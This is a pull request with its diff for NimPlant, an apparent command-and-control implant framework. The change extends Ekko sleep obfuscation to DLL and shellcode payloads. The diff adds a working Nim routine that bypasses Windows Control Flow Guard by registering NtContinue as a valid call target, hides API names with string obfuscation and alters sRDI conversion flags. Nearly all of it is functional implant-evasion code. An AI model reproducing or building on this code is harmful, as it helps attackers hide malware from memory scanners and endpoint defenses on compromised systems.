### PR TITLE
Fix Sleep Obfuscation for DLL and Shellcode payloads 

### DIFF
--- a/NimPlant.py
+++ b/NimPlant.py
@@ -130,7 +130,7 @@ def compile_nim(binary_type, xor_key, debug=False):
 
     # Enable Ekko sleep mask if defined in config.toml, but only for self-contained executables
     sleep_mask_enabled = config["nimplant"]["sleepMask"]
-    if sleep_mask_enabled and binary_type not in ["exe", "exe-selfdelete"]:
+    if sleep_mask_enabled and binary_type not in ["exe", "exe-selfdelete", "dll"]:
         print("       ERROR: Ekko sleep mask is only supported for executables!")
         print(f"       Compiling {binary_type} without sleep mask...")
         sleep_mask_enabled = False

--- a/NimPlant.py
+++ b/NimPlant.py
@@ -130,7 +130,7 @@ def compile_nim(binary_type, xor_key, debug=False):
 
     # Enable Ekko sleep mask if defined in config.toml, but only for self-contained executables
     sleep_mask_enabled = config["nimplant"]["sleepMask"]
-    if sleep_mask_enabled and binary_type not in ["exe", "exe-selfdelete", "dll"]:
+    if sleep_mask_enabled and binary_type not in ["exe", "exe-selfdelete", "dll", "raw"]:
         print("       ERROR: Ekko sleep mask is only supported for executables!")
         print(f"       Compiling {binary_type} without sleep mask...")
         sleep_mask_enabled = False
@@ -185,7 +185,7 @@ def compile_nim(binary_type, xor_key, debug=False):
 
         # Convert DLL to PIC using sRDI
         dll = open("client/bin/NimPlant.dll", "rb").read()
-        shellcode = ConvertToShellcode(dll, HashFunctionName("Update"), flags=0x5)
+        shellcode = ConvertToShellcode(dll, HashFunctionName("Update"), flags=0x4)
         with open("client/bin/NimPlant.bin", "wb") as f:
             f.write(shellcode)
 

--- a/client/util/cfg.nim
+++ b/client/util/cfg.nim
@@ -1,0 +1,88 @@
+# This is a Nim-Port of the CFG bypass required for Ekko sleep to work in a CFG enabled process (like rundll32.exe)
+# Original works : https://github.com/ScriptIdiot/sleepmask_ekko_cfg, https://github.com/Crypt0s/Ekko_CFG_Bypass
+import winim/lean
+import strenc
+
+type
+  CFG_CALL_TARGET_INFO {.pure.} = object
+    Offset: ULONG_PTR
+    Flags: ULONG_PTR
+
+type 
+  VM_INFORMATION {.pure.} = object
+    dwNumberOfOffsets: DWORD
+    plOutput: ptr ULONG
+    ptOffsets: ptr CFG_CALL_TARGET_INFO
+    pMustBeZero: PVOID
+    pMoarZero: PVOID
+
+type 
+  MEMORY_RANGE_ENTRY {.pure.} = object
+    VirtualAddress: PVOID
+    NumberOfBytes: SIZE_T
+
+type 
+  VIRTUAL_MEMORY_INFORMATION_CLASS {.pure.} = enum
+    VmPrefetchInformation
+    VmPagePriorityInformation
+    VmCfgCalltargetInformation
+    VmPageDirtyStateInformation
+
+type 
+  NtSetInformationVirtualMemory_t = proc (hProcess: HANDLE, VmInformationClass: VIRTUAL_MEMORY_INFORMATION_CLASS, NumberOfEntries: ULONG_PTR, VirtualAddresses: ptr MEMORY_RANGE_ENTRY, VmInformation: PVOID, VmInformationLength: ULONG): NTSTATUS {.stdcall.}
+
+# Value taken from: https://www.codemachine.com/downloads/win10.1803/winnt.h
+var CFG_CALL_TARGET_VALID = 0x00000001
+
+proc evadeCFG*(address: PVOID): BOOl =
+  var dwOutput: ULONG
+  var status: NTSTATUS
+  var mbi: MEMORY_BASIC_INFORMATION
+  var VmInformation: VM_INFORMATION
+  var VirtualAddresses: MEMORY_RANGE_ENTRY
+  var OffsetInformation: CFG_CALL_TARGET_INFO
+  var size: SIZE_T
+
+  # Get start of region in which function resides 
+  size = VirtualQuery(address, addr(mbi), sizeof(mbi))
+  
+  if size == 0x0:
+    return false
+
+  if mbi.State != MEM_COMMIT or mbi.Type != MEM_IMAGE:
+    return false
+
+  # Region in which to mark functions as valid CFG call targets
+  VirtualAddresses.NumberOfBytes = cast[SIZE_T](mbi.RegionSize)
+  VirtualAddresses.VirtualAddress = cast[PVOID](mbi.BaseAddress)
+
+  # Create an Offset Information for the function that should be marked as valid for CFG
+  OffsetInformation.Offset = cast[ULONG_PTR](address) - cast[ULONG_PTR](mbi.BaseAddress)
+  OffsetInformation.Flags = CFG_CALL_TARGET_VALID # CFG_CALL_TARGET_VALID
+
+  # Wrap the offsets into a VM_INFORMATION
+  VmInformation.dwNumberOfOffsets = 0x1
+  VmInformation.plOutput = addr(dwOutput)
+  VmInformation.ptOffsets = addr(OffsetInformation)
+  VmInformation.pMustBeZero = nil
+  VmInformation.pMoarZero = nil
+
+  # Resolve the function
+  var NtSetInformationVirtualMemory = cast[NtSetInformationVirtualMemory_t](
+    GetProcAddress(LoadLibraryA(obf("ntdll")), obf("NtSetInformationVirtualMemory"))
+    )
+
+  # Register `address` as a valid call target for CFG
+  status = NtSetInformationVirtualMemory(
+    GetCurrentProcess(), 
+    VmCfgCalltargetInformation, 
+    cast[ULONG_PTR](1), 
+    addr(VirtualAddresses), 
+    cast[PVOID](addr(VmInformation)), 
+    cast[ULONG](sizeof(VmInformation))
+    )
+
+  if status != 0x0:
+    return false
+
+  return true

--- a/client/util/ekko.nim
+++ b/client/util/ekko.nim
@@ -1,12 +1,12 @@
 # This is a Nim-Port of the Ekko Sleep obfuscation by @C5pider, original work: https://github.com/Cracked5pider/Ekko
 # Ported to Nim by Fabian Mosch, @ShitSecure (S3cur3Th1sSh1t)
 
-# TODO: Modify to work with .dll/.bin compilation type, see: https://mez0.cc/posts/vulpes-obfuscating-memory-regions/#Sleeping_with_Timers
 # TODO: Check which exact functions are needed to minimize the imports for winim
 import winim/lean
 import ptr_math
 import std/random
 import strenc
+import cfg
 
 type
   USTRING* {.bycopy.} = object
@@ -75,6 +75,11 @@ proc ekkoObf*(st: int): VOID =
   Img.Buffer = ImageBase
   Img.Length = ImageSize
   Img.MaximumLength = ImageSize
+
+  # Add NtContinue as a valid call target for CFG
+  NtContinue = GetProcAddress(GetModuleHandleA(obf("ntdll")), obf("NtContinue"))
+  discard evadeCFG(NtContinue)
+
   if CreateTimerQueueTimer(addr(hNewTimer), hTimerQueue, cast[WAITORTIMERCALLBACK](RtlCaptureContext),
                           addr(CtxThread), 0, 0, WT_EXECUTEINTIMERTHREAD):
     WaitForSingleObject(hEvent, 0x32)


### PR DESCRIPTION
Fixes the Ekko implementation for sleep obfuscation for DLL and Shellcode payloads (close #1). Changes in this PR:
1. Locate payload base address by matching MZ and PE magic bytes
2. Bypass Control Flow Guard by adding NtContinue as a valid call target
3. Disable the sRDI flag for clearing the DLL header of the payload